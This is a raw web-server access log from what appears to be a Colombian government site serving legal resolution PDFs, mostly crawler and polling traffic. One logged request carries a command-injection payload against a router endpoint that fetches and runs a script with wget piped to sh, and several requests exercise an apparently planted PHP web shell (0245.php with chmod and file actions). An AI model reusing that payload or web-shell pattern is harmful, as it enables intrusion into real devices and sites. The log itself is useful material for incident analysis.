201.245.192.253 - - [29/Jun/2024:13:49:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:13:49:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:13:50:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%20101-150/2002RES126.tif HTTP/1.1" 200 159158
66.249.66.13 - - [29/Jun/2024:13:50:21 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4892.pdf HTTP/1.1" 200 456187
66.249.66.11 - - [29/Jun/2024:13:50:22 -0500] "GET /BLA/resoluciones/AUTOS%202023/2107.pdf HTTP/1.1" 200 410204
201.245.192.253 - - [29/Jun/2024:13:50:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:13:49:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [29/Jun/2024:13:49:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:13:51:22 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4835.pdf HTTP/1.1" 200 522421
216.245.221.92 - - [29/Jun/2024:13:51:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:13:51:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:13:51:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:13:50:31 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.13 - - [29/Jun/2024:13:52:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3013.pdf HTTP/1.1" 200 335776
201.245.192.253 - - [29/Jun/2024:13:52:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.124.181.10 - - [29/Jun/2024:13:53:17 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5516.pdf HTTP/1.1" 200 506225
201.124.181.10 - - [29/Jun/2024:13:53:17 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
66.249.66.12 - - [29/Jun/2024:13:53:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2967.pdf HTTP/1.1" 200 483247
66.249.66.13 - - [29/Jun/2024:13:53:35 -0500] "GET /BLA/resoluciones/AUTOS%202023/0368.pdf HTTP/1.1" 200 408883
201.245.192.253 - - [29/Jun/2024:13:53:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:13:53:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:13:54:36 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0224.pdf HTTP/1.1" 200 348235
201.245.192.253 - - [29/Jun/2024:13:54:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:13:55:12 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
66.249.66.11 - - [29/Jun/2024:13:55:37 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
66.249.66.13 - - [29/Jun/2024:13:55:39 -0500] "GET /catalogoisis/Js/AceptarLimpiar.js HTTP/1.1" 200 331
201.245.192.253 - - [29/Jun/2024:13:54:06 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:13:55:40 -0500] "GET /catalogoisis/Js/Cookies.js HTTP/1.1" 200 1369
66.249.66.12 - - [29/Jun/2024:13:55:40 -0500] "GET /catalogoisis/Js/Remote.js HTTP/1.1" 200 436
66.249.66.12 - - [29/Jun/2024:13:55:41 -0500] "GET /catalogoisis/Js/CriterioCombinada.js HTTP/1.1" 200 1843
66.249.66.11 - - [29/Jun/2024:13:55:41 -0500] "GET /catalogoisis/Js/Go.js HTTP/1.1" 200 364
66.249.66.12 - - [29/Jun/2024:13:55:42 -0500] "GET /catalogoisis/Css/Busqueda.css HTTP/1.1" 200 1995
66.249.66.11 - - [29/Jun/2024:13:55:42 -0500] "GET /catalogoisis/Js/Enter.js HTTP/1.1" 200 1208
66.249.66.11 - - [29/Jun/2024:13:55:43 -0500] "GET /catalogoisis/Js/Numero.js HTTP/1.1" 200 398
66.249.66.11 - - [29/Jun/2024:13:55:43 -0500] "GET /catalogoisis/Js/LimpiarCombinada.js HTTP/1.1" 200 207
66.249.74.68 - - [29/Jun/2024:13:55:45 -0500] "GET /dia-internacional-de-la-tierra-actividades-para-estar-en-armonia-y-conexion-con-la-naturaleza.html HTTP/1.1" 200 927
201.245.192.253 - - [29/Jun/2024:13:55:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:13:55:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.48 - - [29/Jun/2024:13:56:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/2231.pdf HTTP/1.1" 200 3049492
66.249.66.11 - - [29/Jun/2024:13:56:37 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3423.pdf HTTP/1.1" 200 1643119
216.245.221.92 - - [29/Jun/2024:13:56:49 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [29/Jun/2024:13:55:14 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 53818
201.245.192.253 - - [29/Jun/2024:13:56:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:13:55:30 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.13 - - [29/Jun/2024:13:57:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1993.pdf HTTP/1.1" 200 975738
66.249.66.12 - - [29/Jun/2024:13:57:39 -0500] "GET /BLA/resoluciones/AUTOS%202023/0123.pdf HTTP/1.1" 200 1429429
201.245.192.253 - - [29/Jun/2024:13:57:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:13:57:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:13:56:21 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52358
66.249.66.13 - - [29/Jun/2024:13:58:12 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201301-1350/20021328.tif HTTP/1.1" 200 96832
66.249.66.12 - - [29/Jun/2024:13:58:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2837.pdf HTTP/1.1" 200 382311
201.245.192.253 - - [29/Jun/2024:13:58:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.224 - - [29/Jun/2024:13:59:05 -0500] "GET /BLA/resoluciones/AUTOS%202023/2565.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:13:59:04 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:13:59:40 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1601.pdf HTTP/1.1" 200 670963
201.245.192.253 - - [29/Jun/2024:13:59:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:13:59:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
40.77.167.50 - - [29/Jun/2024:14:00:08 -0500] "GET /BLA/resoluciones/AUTOS%202021/1703.pdf HTTP/1.1" 304 -
216.244.66.195 - - [29/Jun/2024:14:00:28 -0500] "GET /robots.txt HTTP/1.1" 404 1018
66.249.66.12 - - [29/Jun/2024:14:00:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0909.pdf HTTP/1.1" 200 352962
201.245.192.253 - - [29/Jun/2024:14:00:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:14:01:41 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0113.pdf HTTP/1.1" 200 361594
66.249.66.11 - - [29/Jun/2024:14:01:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2325.pdf HTTP/1.1" 200 452060
216.245.221.92 - - [29/Jun/2024:14:01:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:14:01:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:01:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:14:02:42 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5304.pdf HTTP/1.1" 200 4509291
201.245.192.253 - - [29/Jun/2024:14:02:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
172.22.2.4 - - [29/Jun/2024:14:01:20 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [29/Jun/2024:14:01:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 46045
172.22.2.4 - - [29/Jun/2024:14:03:09 -0500] "GET /BLA/boletinlegal/js/jquery.js HTTP/1.1" 200 57254
52.167.144.224 - - [29/Jun/2024:14:03:14 -0500] "GET /portalsiaccapacitaciones/Listas%20de%20Asistencia%202016/LISTA%20DE%20ASISTENCIA%2026%20DE%20MAYO.pdf HTTP/1.1" 200 1181031
186.31.11.232 - - [29/Jun/2024:14:03:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/2700.pdf HTTP/1.1" 200 13546798
186.31.11.232 - - [29/Jun/2024:14:03:32 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
172.22.2.4 - - [29/Jun/2024:14:02:11 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 51133
201.245.192.253 - - [29/Jun/2024:14:03:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:03:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:14:04:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1889.pdf HTTP/1.1" 200 584748
201.245.192.253 - - [29/Jun/2024:14:04:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:14:04:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [29/Jun/2024:14:05:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4357.pdf HTTP/1.1" 200 377113
66.249.66.11 - - [29/Jun/2024:14:05:45 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4124.pdf HTTP/1.1" 200 532220
201.245.192.253 - - [29/Jun/2024:14:05:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:05:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:14:06:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2285.pdf HTTP/1.1" 200 1141422
216.245.221.92 - - [29/Jun/2024:14:06:49 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:14:06:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:14:07:46 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4356.pdf HTTP/1.1" 200 391361
185.191.127.212 - - [29/Jun/2024:14:07:46 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F93.123.72.16%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
201.245.192.253 - - [29/Jun/2024:14:07:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:07:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:14:08:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4102.pdf HTTP/1.1" 200 494274
172.22.2.4 - - [29/Jun/2024:14:07:10 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:14:08:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:14:09:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/RES%202002%201251-1301/20021299.tif HTTP/1.1" 200 42124
172.22.2.4 - - [29/Jun/2024:14:08:01 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57485
66.249.66.12 - - [29/Jun/2024:14:09:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0539.pdf HTTP/1.1" 200 353475
66.249.66.12 - - [29/Jun/2024:14:09:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4443.pdf HTTP/1.1" 200 475395
201.245.192.253 - - [29/Jun/2024:14:09:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:09:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:14:09:01 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.12 - - [29/Jun/2024:14:10:48 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4305.pdf HTTP/1.1" 200 383939
201.245.192.253 - - [29/Jun/2024:14:10:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.187 - - [29/Jun/2024:14:11:48 -0500] "GET /BLA/resoluciones/AUTOS%202022/1395.pdf HTTP/1.1" 304 -
66.249.66.12 - - [29/Jun/2024:14:11:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1434.pdf HTTP/1.1" 200 366032
216.245.221.92 - - [29/Jun/2024:14:11:49 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.11 - - [29/Jun/2024:14:11:49 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1002.pdf HTTP/1.1" 200 380873
201.245.192.253 - - [29/Jun/2024:14:11:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:11:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:14:12:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3589.pdf HTTP/1.1" 200 444313
66.249.66.12 - - [29/Jun/2024:14:12:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2977.pdf HTTP/1.1" 200 404827
66.249.66.11 - - [29/Jun/2024:14:12:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3861.pdf HTTP/1.1" 200 575917
66.249.66.11 - - [29/Jun/2024:14:12:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5024.pdf HTTP/1.1" 200 427869
201.245.192.253 - - [29/Jun/2024:14:12:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [29/Jun/2024:14:13:25 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0228.pdf HTTP/1.1" 200 337737
66.249.66.11 - - [29/Jun/2024:14:13:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/5154.pdf HTTP/1.1" 200 1147070
172.22.2.4 - - [29/Jun/2024:14:13:42 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisT-606-15.docx HTTP/1.1" 200 26698
172.22.2.4 - - [29/Jun/2024:14:13:42 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/apple-touch-icon-120x120.png HTTP/1.1" 404 1140
40.77.167.9 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/6541.pdf HTTP/1.1" 304 -
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/apple-touch-icon-precomposed.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/apple-touch-icon.png HTTP/1.1" 404 1140
172.22.2.4 - - [29/Jun/2024:14:13:43 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1140
66.249.66.11 - - [29/Jun/2024:14:13:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3175.pdf HTTP/1.1" 200 334322
201.245.192.253 - - [29/Jun/2024:14:13:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:13:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.13 - - [29/Jun/2024:14:14:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/4428.pdf HTTP/1.1" 200 888151
66.249.66.12 - - [29/Jun/2024:14:14:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3182.pdf HTTP/1.1" 200 362832
172.22.2.4 - - [29/Jun/2024:14:13:00 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [29/Jun/2024:14:14:00 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:14:14:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:14:15:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0882.pdf HTTP/1.1" 200 356720
172.22.2.4 - - [29/Jun/2024:14:13:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60380
66.249.66.11 - - [29/Jun/2024:14:15:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3312.pdf HTTP/1.1" 200 395827
201.245.192.253 - - [29/Jun/2024:14:15:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:15:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.56.173 - - [29/Jun/2024:14:15:58 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3324.pdf HTTP/1.1" 200 2715
47.128.34.132 - - [29/Jun/2024:14:16:11 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=secretaria-de-ambiente-y-bomberos-recuperan-boa-que-estaba-en-una-silla-de-carro-para-bebe.html HTTP/1.1" 200 2800
66.249.66.13 - - [29/Jun/2024:14:16:12 -0500] "GET /Publicaciones/2024EE53464.pdf HTTP/1.1" 404 227
66.249.66.13 - - [29/Jun/2024:14:16:14 -0500] "GET /Publicaciones/2024EE53464.pdf HTTP/1.1" 404 227
66.249.66.11 - - [29/Jun/2024:14:16:15 -0500] "GET /Publicaciones/2024EE53464.pdf HTTP/1.1" 404 227
47.128.27.144 - - [29/Jun/2024:14:16:24 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=01715.pdf HTTP/1.1" 200 2741
47.128.51.116 - - [29/Jun/2024:14:16:36 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=autoridades-incautan-75-partes-de-animales-silvestres-en-usaquen.html HTTP/1.1" 200 2715
66.249.66.12 - - [29/Jun/2024:14:16:39 -0500] "GET /Publicaciones/2024EE53659.pdf HTTP/1.1" 404 227
216.245.221.92 - - [29/Jun/2024:14:16:49 -0500] "HEAD / HTTP/1.1" 200 -
47.128.42.36 - - [29/Jun/2024:14:16:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3021.pdf HTTP/1.1" 200 2738
66.249.66.11 - - [29/Jun/2024:14:16:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4729.pdf HTTP/1.1" 200 356288
201.245.192.253 - - [29/Jun/2024:14:16:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.122.14 - - [29/Jun/2024:14:17:02 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=2852.zip HTTP/1.1" 200 2740
66.249.66.11 - - [29/Jun/2024:14:17:03 -0500] "GET /BLA/resoluciones/Notificaciones/RESOLUCIONES%202020/5459.pdf HTTP/1.1" 304 -
201.245.192.253 - - [29/Jun/2024:14:17:08 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35414
201.245.192.253 - - [29/Jun/2024:14:17:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35128
47.128.125.197 - - [29/Jun/2024:14:17:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=4221.PDF&white=1 HTTP/1.1" 200 3035
47.128.125.197 - - [29/Jun/2024:14:17:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_exe HTTP/1.1" 200 118
47.128.125.197 - - [29/Jun/2024:14:17:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_html HTTP/1.1" 200 230
47.128.125.197 - - [29/Jun/2024:14:17:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_gif HTTP/1.1" 200 175
47.128.125.197 - - [29/Jun/2024:14:17:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_pdf HTTP/1.1" 200 1034
47.128.125.197 - - [29/Jun/2024:14:17:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_diz HTTP/1.1" 200 1027
47.128.125.197 - - [29/Jun/2024:14:17:15 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_txt HTTP/1.1" 200 132
47.128.125.197 - - [29/Jun/2024:14:17:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_ini HTTP/1.1" 200 134
47.128.125.197 - - [29/Jun/2024:14:17:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=ext_rtf HTTP/1.1" 200 164
47.128.125.197 - - [29/Jun/2024:14:17:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=download HTTP/1.1" 200 161
47.128.125.197 - - [29/Jun/2024:14:17:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=img&img=change HTTP/1.1" 200 290
66.249.66.13 - - [29/Jun/2024:14:17:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/3004.pdf HTTP/1.1" 200 460799
47.128.52.111 - - [29/Jun/2024:14:17:28 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=3325.pdf HTTP/1.1" 200 2739
66.249.66.11 - - [29/Jun/2024:14:17:31 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/5262.pdf HTTP/1.1" 200 370932
66.249.66.11 - - [29/Jun/2024:14:17:39 -0500] "GET /BLA/resoluciones/AUTOS%202020/2964.pdf HTTP/1.1" 200 369931
47.128.21.171 - - [29/Jun/2024:14:17:41 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=chmod&f=3203.pdf HTTP/1.1" 200 2709
66.249.66.11 - - [29/Jun/2024:14:17:51 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1699.pdf HTTP/1.1" 200 585527
47.128.63.44 - - [29/Jun/2024:14:17:53 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&f=01750.pdf HTTP/1.1" 200 2741
201.245.192.253 - - [29/Jun/2024:14:17:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:17:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:14:18:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/2916.pdf HTTP/1.1" 200 467150
40.77.167.9 - - [29/Jun/2024:14:18:27 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/1776.pdf HTTP/1.1" 200 518524
66.249.66.12 - - [29/Jun/2024:14:18:39 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/05542.pdf HTTP/1.1" 200 879376
201.245.192.253 - - [29/Jun/2024:14:18:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [29/Jun/2024:14:18:58 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
201.245.192.253 - - [29/Jun/2024:14:19:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35267
66.249.66.11 - - [29/Jun/2024:14:19:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/1598.pdf HTTP/1.1" 200 345691
66.249.66.11 - - [29/Jun/2024:14:19:52 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0440.pdf HTTP/1.1" 200 335119
201.245.192.253 - - [29/Jun/2024:14:19:57 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [29/Jun/2024:14:19:57 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [29/Jun/2024:14:20:16 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202022/0331.pdf HTTP/1.1" 200 494080
66.249.66.11 - - [29/Jun/2024:14:20:27 -0500] "GET /BLA/resoluciones/AUTOS%202020/2587.pdf HTTP/1.1" 200 324860
172.22.2.4 - - [29/Jun/2024:14:18:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
